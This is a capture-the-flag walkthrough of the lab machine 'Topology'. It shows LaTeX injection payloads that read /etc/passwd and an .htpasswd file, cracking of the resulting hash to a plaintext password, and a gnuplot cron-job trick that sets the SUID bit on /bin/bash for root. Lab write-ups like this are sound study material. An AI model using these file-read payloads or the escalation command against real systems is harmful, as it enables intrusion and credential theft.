Topology

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 5000 10.129.76.27 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-11 23:49 +08
Nmap scan report for 10.129.76.27
Host is up (0.012s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

HTTP exploits it seems.

LaTeX Project -> LFI

The website is seems to be a university website:

There's a LaTeX Equation Generator available. LaTeX is a software made for documentation, and I'm roughly familiar with how it works to make mathematical equations for stuff like university math module notes. Anyways, we have to add latex.topology.htb to our /etc/hosts file to visit the equation.php site available.

On the site itself, it just shows some basic LaTeX syntax:

There are some exploits available pertaining to Latex Injection, such as being able to read machine files. I tried to use \input{/etc/passwd} to read files, but there's a WAF blocking it:

I tested different payloads, and eventually found one that worked on this site:

Hacking with LaTeXSebastian Neef - 0day.work

\newread\file
\openin\file=/etc/passwd
\read\file to\line
\text{\line}
\closein\file

Using this, we can get the first line of the /etc/passwd file:

Before carrying on, I wanted to some proper web enumeration to find out what I was supposed to do with this LFI. Using wfuzz, I found a dev subdomain:

$ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.topology.htb" --hc=200 -u http://topology.htb
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://topology.htb/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload                     
=====================================================================

000000019:   401        14 L     54 W       463 Ch      "dev"

This returns a 401, and visiting it requires credentials:

This is a HTTP sign in, meaning we can probably find the credentials in a .htpasswd file somewhere. Also, it coincides with the one-line LFI that we have. However, the same command does not work with the /var/www/dev/.htpasswd file, which is definitely where the password hash is stored.

In this case, what we can do is try to use other commands, like \lstinputlisting. However, this payload doesn't work:

\lstinputlisting{/var/www/dev/.htpasswd}

It doesn't work (as I've learnt) because the machine asks for LaTeX inline math mode. There are different modes for LaTeX present, and they would parse characters differently. If we use '$' signs, we can force the machine to process our query by switching mode for it.

What are the differences between $...$, $$...$$, \(...\), and \[...\]?TeX - LaTeX Stack Exchange

If we use \\lstinputlisting{/var/www/dev/.htpasswd} instead, we see that it processes it as text:

So by using $\lstinputlisting{/var/www/dev/.htpasswd}$, it would be processed as an expression (similar to $() in bash) and loads the hash:

We can crack the hash easily with john:

$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
calculus20       (vdaisley)     
1g 0:00:00:04 DONE (2023-06-12 00:30) 0.2375g/s 236511p/s 236511c/s 236511C/s calebd1..caitlyn09
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Then we can access the dev subdomain:

More importantly, we can access the user via ssh:

Privilege Escalation

GNUPlot

Within the /opt directory, there was a gnuplot file present:

vdaisley@topology:/opt$ ls
gnuplot
vdaisley@topology:/opt$ ls -al
total 12
drwxr-xr-x  3 root root 4096 May 19 13:04 .
drwxr-xr-x 18 root root 4096 May 19 13:04 ..
drwx-wx-wx  2 root root 4096 Jun  6 08:14 gnuplot

I also ran a pspy64 while searching more about this particular software, and found some interesting processes:

2023/06/11 12:35:01 CMD: UID=0    PID=2774   | /usr/sbin/CRON -f 
2023/06/11 12:35:01 CMD: UID=0    PID=2773   | /usr/sbin/CRON -f 
2023/06/11 12:35:01 CMD: UID=0    PID=2776   | /bin/sh /opt/gnuplot/getdata.sh 
2023/06/11 12:35:01 CMD: UID=0    PID=2775   | /bin/sh -c /opt/gnuplot/getdata.sh 
2023/06/11 12:35:01 CMD: UID=0    PID=2781   | /bin/sh -c find "/opt/gnuplot" -name "*.plt" -exec gnuplot {} \;                                                                           
2023/06/11 12:35:01 CMD: UID=0    PID=2787   | gnuplot /opt/gnuplot/loadplot.plt 
2023/06/11 12:35:01 CMD: UID=0    PID=2786   | sed s/,//g 
2023/06/11 12:35:01 CMD: UID=0    PID=2785   | 
2023/06/11 12:35:01 CMD: UID=0    PID=2782   | find /opt/gnuplot -name *.plt -exec gnuplot {} ;                                                                                           
2023/06/11 12:35:01 CMD: UID=0    PID=2788   | gnuplot /opt/gnuplot/networkplot.plt 

We don't have read access to the directory, but we have write access, meaning we have to manipulate the .plt files present on the /opt directory to somehow achieve RCE as root. Or, we can just add another .plt file.

I found a resource that shows the system keyword can be used to execute system commands:

Gnuplot documentation

We just need to create a priv.plt file within the directory:

system "chmod u+s /bin/bash"

Then, we can just wait for root to execute our new file and privesc that way:

Rooted!